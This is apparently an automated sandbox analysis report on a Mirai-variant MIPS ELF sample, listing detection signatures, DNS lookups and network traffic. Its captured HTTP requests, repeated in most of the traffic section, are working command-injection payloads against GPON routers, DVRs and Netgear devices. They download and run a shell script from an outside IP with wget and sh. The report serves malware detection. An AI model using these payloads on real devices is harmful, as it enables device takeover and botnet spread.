Linux Analysis Report
firmware.mipsel.elf

Overview

General Information

Sample name: firmware.mipsel.elf
Analysis ID: 1502459
MD5: 17500fa6d517dda14c00b874abb11221
SHA1: fa94505cffed5bbb882d078afcd643194dcf3e1a
SHA256: 7621e7779d8779509c477f3ba63e51c91ceca9299ec751927c4c682a437fea87
Tags: elffirmware
Infos:

Detection

Score: 92
Range: 0 - 100
Whitelisted: false

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Drops files in suspicious directories
Executes the "crontab" command typically for achieving persistence
Sample tries to persist itself using cron
Tries to resolve many domain names, but no domain seems valid
Uses known network protocols on non-standard ports
Connects to many different domains
Detected TCP or UDP traffic on non-standard ports
Executes commands using a shell command-line interpreter
Executes massive DNS lookups (> 100)
Executes the "hostname" command used to retrieve the computers name
HTTP GET or POST without a user agent
Sample has stripped symbol table
Sample tries to set the executable flag
Uses the "uname" system call to query kernel version information (possible evasion)
Writes ELF files to disk
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: firmware.mipsel.elf Avira: detected
Antivirus detection for dropped file
Source: /usr/bin/dxyeeuv Avira: detection malicious, Label: LINUX/Mirai.bonb
Multi AV Scanner detection for submitted file
Source: firmware.mipsel.elf ReversingLabs: Detection: 50%
Source: firmware.mipsel.elf Virustotal: Detection: 56% Perma Link

Networking
barindex
Tries to resolve many domain names, but no domain seems valid
Source: unknown DNS traffic detected: query: www.akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lkfe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.klaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fefe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.kcld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lkdd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cbkf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dffe.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dkcf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lkff.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: ddlk.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: fbcb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ckdb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aaaa.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dffl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lcdd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kfcl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dcdl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.becd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: edkc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ldak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aaaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: akak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aaaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: baaf.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.ffkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cdad.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fbcb.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.edkc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: klkf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ddlk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: afbd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dffk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cbll.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.eaed.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: alla.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.klkf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.elle.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cbkf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cbfe.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: ffkd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: blkk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: becd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kcld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: lcdd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ckdb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.acll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: aldf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.afbd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dkld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lclk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dkcf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fbef.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.ldak.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kdaa.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: fbef.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dffl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.alla.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dffk.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.kkbb.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.acfa.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.blkk.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.dkld.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.fefe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.lkfe.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dffl.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: lfad.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.lfad.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: cbll.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.cbfe.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dffe.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: lkdd.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.aldf.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: www.dcdl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dffe.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: acfa.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.lbdc.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: kfcl.ru replaycode: Name error (3)
Source: unknown DNS traffic detected: query: dkfb.ru replaycode: Server failure (2)
Source: unknown DNS traffic detected: query: www.baaf.ru replaycode: Server failure (2)
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 60056 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 60062 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51356 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60066 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51360 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60070 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51364 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60074 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51370 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 51374 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60084 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51378 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 60088 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 51382 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40634 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40642 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40648 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40650 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40652 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40654 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 40664 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 46234 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46236 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46238 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46240 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46242 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46244 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 46250 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 36022 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54608 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36030 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54616 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36040 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54626 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36050 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54636 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36060 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54646 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36072 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54658 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 36082 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54670 -> 85
Source: unknown Network traffic detected: HTTP traffic on port 32782 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32792 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32802 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32810 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32818 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32828 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 32840 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 59556 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59570 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59580 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59592 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59602 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59612 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 59622 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 37556 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37572 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37590 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37604 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37620 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37632 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 37646 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 40634 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39238 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40638 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39242 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40642 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39246 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40646 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39250 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39254 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40650 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39256 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40656 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39260 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40660 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 54286 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41766 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54290 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41770 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54294 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 41820 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54552 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42056 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54704 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42288 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54814 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42398 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 54990 -> 8443
Source: unknown Network traffic detected: HTTP traffic on port 42522 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 39730 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39818 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39820 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39908 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39910 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 39998 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 40016 -> 81
Source: unknown Network traffic detected: HTTP traffic on port 58596 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58598 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58600 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58604 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58606 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58608 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 58612 -> 83
Connects to many different domains
Source: unknown Network traffic detected: DNS query count 250
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.15:42618 -> 32.10.0.0:0
Source: global traffic TCP traffic: 192.168.2.15:34096 -> 8.8.8.8:81
Executes massive DNS lookups (> 100)
Source: global traffic DNS traffic detected: number of DNS queries: 250
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.1Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.1Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.3Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.4Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.149.243.53Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.3Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.4Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.4Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.4Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.4Connection: close
